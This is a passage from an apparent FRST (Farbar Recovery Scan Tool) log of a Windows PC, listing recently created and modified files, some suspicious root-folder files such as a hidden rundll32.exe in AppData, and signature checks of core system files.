2017-04-16 21:29 - 2017-04-16 21:39 - 100223515 _____ C:\Users\USER\Downloads\Manchester United vs Chelsea 2-0 2017 - Highlights _ Goals.mp4
2017-04-16 14:57 - 2017-04-16 14:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01009.Wdf
2017-04-15 22:08 - 2017-04-15 23:03 - 43901813 _____ C:\Users\USER\Downloads\Cristiano Ronaldo ● Complete Goalscorer, Scoring in Every Way.mp4.part
2017-04-14 13:35 - 2017-04-14 13:36 - 00069080 _____ C:\Users\USER\Downloads\Tutorial for freelancers.pdf
2017-04-12 19:24 - 2017-04-12 19:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QPST
2017-04-12 19:24 - 2017-04-12 19:24 - 00000000 ____D C:\Program Files (x86)\QPST
2017-04-12 19:19 - 2017-04-12 19:21 - 08233607 _____ C:\Users\USER\Downloads\QPST Software_2.7.323 (Unlock-Huawei-Zte.Blogspot.Com).zip
2017-04-07 14:22 - 2017-04-07 14:22 - 00000890 _____ C:\Users\USER\Downloads\Documents - Shortcut.lnk
2017-04-06 17:02 - 2017-04-06 17:02 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-04-06 17:02 - 2017-04-06 17:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-04-06 11:55 - 2017-04-06 11:55 - 00000000 ____D C:\Users\USER\AppData\Roaming\Opera Software
2017-04-06 11:55 - 2017-04-06 11:55 - 00000000 ____D C:\Users\USER\AppData\Local\Opera Software
2017-04-06 11:54 - 2017-04-24 15:50 - 00003832 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1491468847
2017-04-06 11:54 - 2017-04-24 15:49 - 00001143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-04-06 11:54 - 2017-04-06 11:54 - 00001143 _____ C:\Users\Public\Desktop\Opera.lnk
2017-04-06 11:36 - 2017-04-24 15:50 - 00000000 ____D C:\Program Files (x86)\Opera
2017-04-05 13:26 - 2017-05-02 22:37 - 00000000 ____D C:\Users\USER\AppData\Roaming\BluetoothDriverInstaller
2017-04-05 13:26 - 2017-05-02 22:37 - 00000000 ____D C:\ProgramData\TEMP
2017-04-05 13:25 - 2017-04-05 13:25 - 03260416 _____ (BluetoothInstaller.com) C:\Users\USER\Downloads\BluetoothDriverInstaller_x64.exe
2017-04-05 10:32 - 2017-05-05 12:02 - 00000000 ____D C:\Windows\Minidump
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-05-05 12:41 - 2016-12-14 21:16 - 00000000 ____D C:\Users\USER\AppData\Roaming\Skype
2017-05-05 12:34 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\tracing
2017-05-05 12:02 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\Inf
2017-05-05 12:01 - 2017-01-16 09:06 - 00000000 ____D C:\Users\USER\AppData\LocalLow\Mozilla
2017-05-05 12:00 - 2017-02-06 12:06 - 00000000 ____D C:\Program Files (x86)\Ask.com
2017-05-05 11:38 - 2017-01-20 17:18 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2017-05-05 11:38 - 2013-08-22 17:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-05 11:29 - 2017-01-24 10:59 - 00000000 ____D C:\Program Files (x86)\Driver Downloader
2017-05-05 11:24 - 2016-11-27 13:45 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1975919165-801266099-53085287-1001
2017-05-05 11:12 - 2013-08-22 16:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-05-04 21:11 - 2016-11-27 13:58 - 00000000 ____D C:\Users\USER\AppData\Roaming\vlc
2017-05-04 15:57 - 2016-11-27 13:44 - 00818732 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-04 10:27 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\AppReadiness
2017-05-02 22:20 - 2016-11-27 13:39 - 00000000 ____D C:\Users\USER\AppData\Local\Packages
2017-05-02 10:02 - 2016-11-27 13:45 - 00000000 ____D C:\ProgramData\KMSAutoS
2017-05-01 19:07 - 2017-03-09 18:51 - 00000000 ____D C:\Users\USER\AppData\Roaming\Grammarly
2017-04-29 08:52 - 2016-11-29 01:28 - 00000000 ____D C:\Users\USER\AppData\Roaming\dvdcss
2017-04-28 20:44 - 2017-03-06 19:20 - 00000000 ____D C:\Users\USER\AppData\Roaming\WhatsApp
2017-04-28 20:38 - 2017-01-16 01:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-28 20:38 - 2016-11-27 14:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-28 17:22 - 2017-01-11 10:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-28 17:22 - 2017-01-11 10:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-28 12:02 - 2017-03-06 19:19 - 00000000 ____D C:\Users\USER\AppData\Local\SquirrelTemp
2017-04-27 16:48 - 2017-03-06 19:19 - 00000000 ____D C:\Users\USER\AppData\Local\WhatsApp
2017-04-27 16:47 - 2017-03-06 19:20 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2017-04-27 12:12 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\system32\NDF
2017-04-22 23:10 - 2016-11-27 13:59 - 00000000 ____D C:\Users\USER\Downloads\SHAREit
2017-04-22 22:28 - 2016-12-23 12:33 - 00000510 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2017-04-13 19:50 - 2017-01-30 16:13 - 00000000 ____D C:\Users\USER\AppData\Local\Package Cache
2017-04-13 18:08 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\LiveKernelReports
2017-04-12 19:24 - 2016-11-27 13:47 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-04-06 17:02 - 2016-12-14 21:52 - 00002713 _____ C:\Users\Public\Desktop\Skype.lnk
2017-04-06 17:02 - 2016-12-14 21:15 - 00000000 ____D C:\ProgramData\Skype
==================== Files in the root of some directories =======
2017-01-24 11:11 - 2017-01-24 11:11 - 0794046 _____ () C:\Program Files\d32aaa99ba12e4ec21a96aaae151488b.rar
2017-04-25 19:58 - 2017-04-25 19:58 - 0199010 __RSH () C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-01 18:21 - 2017-04-01 18:21 - 0000000 ____H () C:\Users\USER\AppData\Roaming\Microsoft\AppData.dll
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2017-05-03 20:18
==================== End of FRST.txt ============================